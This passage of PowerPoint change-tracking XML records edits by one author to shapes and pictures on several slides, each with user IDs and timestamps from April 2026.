          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:52:30.511" v="461" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="9" creationId="{0A38CA52-8880-34C6-518C-20CAB350A559}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:58:51.661" v="154" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="9" creationId="{B06F6D4F-9632-9FC5-B754-FD07DCDBBA12}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:58:47.116" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="11" creationId="{08211E9B-6D1C-17F6-08E9-99C56E7BB272}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:52:27.401" v="460" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="11" creationId="{1BF37ED5-9A31-DB39-1E42-8E978A12A0FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:53:07.627" v="466" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="13" creationId="{6D97716F-B418-759C-1199-507BE2F4F8A6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:51:32.177" v="456" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="14" creationId="{BF00B2FF-A0FE-8633-F6AD-B4B86E862DB9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:51:39.901" v="457" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:spMk id="16" creationId="{EF63F3CB-10E7-BE1F-240A-ACCEA16E2FB9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:50:32.395" v="450" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:picMk id="4" creationId="{664714DD-5D57-8E55-5A00-78D572E323CA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T15:58:49.347" v="153" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:picMk id="7" creationId="{6BCFAFF2-EE94-3302-8A0B-60082E35DCB0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:49:53.513" v="442" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66459088" sldId="262"/>
            <ac:picMk id="10" creationId="{591E4730-F8C6-8035-4E15-DFFC2765B59F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:49:42.335" v="665" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2555790702" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:44:04.149" v="640" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555790702" sldId="263"/>
            <ac:spMk id="2" creationId="{EB16D566-FBB1-D626-DA02-CD515B0709E7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:17:26.695" v="569" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555790702" sldId="263"/>
            <ac:spMk id="3" creationId="{94C0BEBB-5C62-2A0E-6BB7-3A71D625258F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:43:20.292" v="635" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555790702" sldId="263"/>
            <ac:spMk id="6" creationId="{9F0891AC-5BEC-5F1B-E472-71686746FA3A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:43:27.514" v="636" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555790702" sldId="263"/>
            <ac:spMk id="7" creationId="{A8BDC80E-21ED-722E-ED86-38628713E6E2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:49:42.335" v="665" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555790702" sldId="263"/>
            <ac:spMk id="8" creationId="{7E91BBC9-8697-4B5F-017C-D6D04578C72B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:08:53.312" v="268" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555790702" sldId="263"/>
            <ac:spMk id="8" creationId="{A0EC8C81-ED14-F541-8307-853287FC29D9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:08:45.051" v="265" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555790702" sldId="263"/>
            <ac:spMk id="10" creationId="{209B4EC4-F421-5204-FC36-A853A11D691E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:45:29.201" v="651" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555790702" sldId="263"/>
            <ac:spMk id="10" creationId="{9EF89441-E78A-ADF1-0FBC-D8F100928DB9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:45:38.675" v="652" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555790702" sldId="263"/>
            <ac:picMk id="4" creationId="{63EBB245-CBE0-DB1F-B99B-86564F693E78}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:08:42.998" v="264" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2555790702" sldId="263"/>
            <ac:picMk id="6" creationId="{358F40E3-6810-4B99-8C58-DCB68622A674}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:11:06.608" v="282" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1971085901" sldId="264"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp del mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:11:09.962" v="283" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4000182247" sldId="265"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:11:11.518" v="284" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="273908541" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:59:43.286" v="501" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2318737129" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:58:42.860" v="490" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:spMk id="3" creationId="{0CDB2BB5-AB80-E482-D002-CD76035856ED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:57:32.026" v="483" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:spMk id="4" creationId="{53ABB1AE-A9DD-9656-102E-4E2D0E1D9347}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:02:18.602" v="189" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:spMk id="5" creationId="{4E9E9158-00D7-C017-4260-D25E57ADAFAD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:59:43.286" v="501" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:spMk id="7" creationId="{9F055CC2-7FF5-1E6E-2BE2-61AD982CC5BE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:58:37.665" v="489" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:spMk id="9" creationId="{68A1F0F3-3F7E-8FCC-20A0-2AFE741A46E5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:02:28.256" v="193" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:spMk id="11" creationId="{3B016BC2-6A9B-C60F-F7C9-63C7C18CB943}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:02:26.439" v="192" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:spMk id="13" creationId="{76BEB9EE-8CD9-73FA-EBE8-54C0E3840532}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:02:16.267" v="188" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:spMk id="15" creationId="{68D1BCFB-324A-044B-6BF7-57A401292922}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:02:23.880" v="191" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:picMk id="3" creationId="{5295E03B-CB87-C443-E393-F2B3BCA2D8BD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:57:39.357" v="484" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:picMk id="6" creationId="{37D6F9CD-E515-F324-D04C-CD8EB4CF05BE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:02:21.423" v="190" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2318737129" sldId="267"/>
            <ac:picMk id="7" creationId="{C7433FD6-1B60-B79F-D1BF-A35D4735E285}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:49:07.515" v="663" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1738585828" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:06:27.459" v="541" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:spMk id="3" creationId="{66E28764-BBD0-41EA-3737-05EA56E1224A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:05:18.961" v="227" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:spMk id="5" creationId="{EE39A42E-2ED2-CA9E-F28C-E88EF928432E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:48:37.427" v="662" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:spMk id="6" creationId="{4A38CAA9-06E2-F987-FD5F-5D75CAFAF79F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:05:15.243" v="224" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:spMk id="7" creationId="{D89D0869-732E-11ED-0727-F366449D936F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:06:36.271" v="543" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:spMk id="8" creationId="{133E09D1-4C12-B3D2-34F5-F85D9DBCF3B7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:01:35.254" v="507" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:spMk id="9" creationId="{F80BCD74-36D6-8567-96F0-283D8B30AE2F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:09:20.174" v="559" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:spMk id="10" creationId="{BDB09517-A64B-6F6A-E016-821503247B11}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:09:07.262" v="556" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:spMk id="13" creationId="{D53C671F-14E2-54D7-0D72-2532C83BD372}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:49:07.515" v="663" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:spMk id="14" creationId="{9A11CDC5-AA9A-181D-6F85-CB62E8096ACF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T16:05:17.017" v="226" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:picMk id="3" creationId="{4742A790-84EC-A6A2-9F43-C92FCE75EFCA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:01:40.195" v="508" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:picMk id="4" creationId="{82E81C61-2EB8-E614-1AEB-F67EE091E532}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-22T17:01:51.385" v="511" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1738585828" sldId="268"/>
            <ac:picMk id="11" creationId="{A608E180-BF6E-135D-B1F6-69C54DC91A4C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod setBg">
        <pc:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T12:07:35.124" v="839" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1171091830" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T12:05:53.498" v="828" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1171091830" sldId="269"/>
            <ac:spMk id="4" creationId="{84654EFB-E980-F706-4954-8E7891A38B47}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T12:07:02.270" v="833" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1171091830" sldId="269"/>
            <ac:spMk id="5" creationId="{7A5926DD-C1BE-0AED-8456-6A6744317039}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:21:20.873" v="731" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1171091830" sldId="269"/>
            <ac:spMk id="8" creationId="{63644BFD-D22E-4019-B666-387DA51AEAFD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T12:07:35.124" v="839" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1171091830" sldId="269"/>
            <ac:spMk id="8" creationId="{E9C5E1C8-3289-65DF-EE83-40E020FF4820}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:21:20.873" v="731" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1171091830" sldId="269"/>
            <ac:spMk id="14" creationId="{3776B14B-F2F4-4825-8DA8-8C7A0F2B3960}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:21:20.873" v="731" actId="26606"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1171091830" sldId="269"/>
            <ac:grpSpMk id="10" creationId="{5FE9FE4C-C9E0-4C54-8010-EA9D29CD4D59}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:21:50.762" v="733" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1171091830" sldId="269"/>
            <ac:picMk id="3" creationId="{DA010EAE-3F88-049C-A345-21F59D1B2E02}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Andrian Morteanu (2242425)" userId="38732de0-fe42-49cd-b46a-d1989be72c36" providerId="ADAL" clId="{3E1A85D5-FA78-4470-B607-22B9AF80FB90}" dt="2026-04-23T11:23:15.941" v="741" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1171091830" sldId="269"/>
            <ac:picMk id="7" creationId="{A4F017AD-4FFD-69A0-EC03-BF47216B0FF7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
